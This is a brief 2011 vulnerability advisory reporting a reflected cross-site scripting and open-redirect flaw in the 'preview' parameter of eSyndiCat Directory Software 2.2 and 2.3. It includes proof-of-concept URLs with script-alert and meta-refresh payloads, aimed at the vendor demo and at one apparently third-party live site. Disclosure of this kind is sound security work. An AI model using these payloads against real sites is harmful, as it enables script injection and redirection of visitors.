eSyndiCat Directory Software versions 2.2 and 2.3 suffer from a cross site scripting vulnerability.
662c6a9c8cd99810c4bea5fd7e48ca68e762fabe8afbf11ec54ca5529abdd774
eSyndiCat Directory Software ( preview= ) version 2.2 and 2.3 - Cross-Site Scripting ( XSS ) & Redirect
http://www.esyndicat.com
30 - 01 - 2011
Avram Marius ( d3v1l )
http://twitter.com/securityshell - http://security-sh3ll.blogspot.com
--------------------------------------------------------------------------
Poc: 1 XSS & Redirect on v.2.3
http://www.esyndicat.com/demo/?preview="><script>alert('XSS')</script>
http://www.esyndicat.com/demo/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
--------------------------------------------------------------------------
Poc: 2 XSS & Redirect on v.2.2
http://ekedai.net/date/2008/08/?preview="><script>alert('XSS')</script>
http://ekedai.net/date/2008/08/?preview="><meta http-equiv="Refresh" content="0;url=http://www.google.com/"> ""
--------------------------------------------------------------------------